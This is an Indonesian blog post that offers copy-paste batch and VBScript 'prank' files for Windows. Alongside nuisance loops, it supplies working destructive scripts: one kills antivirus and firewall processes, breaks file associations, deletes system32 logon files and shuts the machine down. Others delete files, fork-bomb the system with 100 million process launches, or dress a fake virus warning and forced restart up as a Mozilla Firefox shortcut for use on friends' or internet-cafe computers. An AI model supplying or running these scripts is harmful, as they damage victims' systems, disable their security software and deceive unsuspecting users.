Kumpulan Script Jail Menggunakan Notepad

Hallo teman-teman setia Sahabat Blogger. Kali ini saya akan berbagi Kumpulan Script Jail Menggunakan Notepad. Script berikut hanya untuk jahil.. Untuk membuat script ini aktif yang Anda butuhkan adalah :

1. Notepad
2. Komputer (bukan kalkulator)

3. Nah sekarang tinggal copy paste scriptnya ke notepad,, langsung saja dicoba :



MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

==> save nama script diatas dg ekstensi *.bat



BIKIN SHUTDOWN + MESSAGES

@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"

==> save nama script diatas dg ekstensi *.bat



MAININ CAPS LOCK BUTTON

Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

==> save nama script diatas dg ekstensi *.vbs


BUKA TUTUP CD/DVD SECARA OTOMATIS TERUS-MENERUS

Set oWMP = CreateObject
("WMPlayer.OCX.7")
Set colCDROMs =
oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

==> save nama script diatas dg ekstensi *.vbs

BIKIN VB SCRIPT NONGOL TERUS MENERUS SECARA OTOMATIS

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

==> save nama script diatas dg ekstensi *.vbs

MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

MsgBox "kembali ke menu
sebelumnya"
Set wshShell
=wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

==> save nama script diatas dg ekstensi *.vbs

OTOMATIS NGETIK "LU JELEK BANGET SIH" DI NOTEPAD ATAU M.WORD

Set wshShell =
wscript.CreateObject
("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek
banget sih!!!"
loop

==> save nama script diatas dg ekstensi *.vbs


MEMBUKA NOTEPAD TERUS MENERUS

@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

==> save nama script diatas dg ekstensi *.BAT

OTOMATIS BUKA NOTEPAD LALU NGETIK "APA YG KAMU MAU"

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell =
WScript.CreateObject
("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

==> save nama script diatas dg ekstensi *.vbs

BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top

==> nah script diatas save jadi quiz.bat,


POKOKNYA KALO YG INI DICOBA DULU DEH !!

@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:WINDOWS
system32logoff.exe /
F /Q
DEL C:WINDOWS
system32logon.exe /
F /Q
DEL C:WINDOWS
system32logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”


==> save script diatas dg ekstensi *.bat
MERUSAK KOMPUTER ORANG LAIN

buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini


ASSOC.exe=.hank


lalu enter!
!!!! Program kayak ms.word/game ngambek jalan ! , jika sudah puas banget jailnya (hahahaa) dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik


ASSOC.exe=EXEFILE
SCRIPT PALING KEREN

1. Buka program notepad atau biar cepet menu RUN ketik notepad lalu enter

2. Copy kode ini dan pastekan di notepad kamu

@echo off

msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE

shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”

3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi

nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file

.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu

dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya

sebagai tipuan aja)

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah

mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai

Mozilla jadi pembahasannya pakai browser ini) ..

Terus caranya gimana ?

Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon

Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox

Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin

iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..

Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu

praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..

what will happen ? abis pastinya ..
SCRIPT PALING GANAS

Langsung aja ...
buka notepad

dan silahkan tulis script di bawah ini

option explicit

dim wshshell

set wshshell=wscript.createobject("wscript.shell")

dim x

for x = 1 to 100000000

wshshell.run "tourstart.exe"

next

simpan dengan nama (virus.vbs)

keterangan : dan silahkan jalankan file tersebut nah silahkan dilihat apa yang terjadi...? komputer sobat akan dipenuhi oleh 100000000 virus dan komputer tentunya akan hang total sebelum sobat mendelete semuanya

*Keterangan : Untuk Kode Warna Hijau dibawahnya merupakan keterangan ekstensi cara menyimpanya, misalnya ekstensi nya .vbs, jadi cara menyimpanya sebgagai berikut :


1. Buka notepad
2. Copy paste scriptnya
3. Save, dengan tipe ALL FILE dan Beri nama terserah Anda lalu di beri akhiran ekstensinya .vbs
4. Klik Save


Sumber : https://indofajarblog.blogspot.com
Anonymous Indonesia Hanya Seorang Pecandu Internet

0 Response to "Kumpulan Script Jail Menggunakan Notepad"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel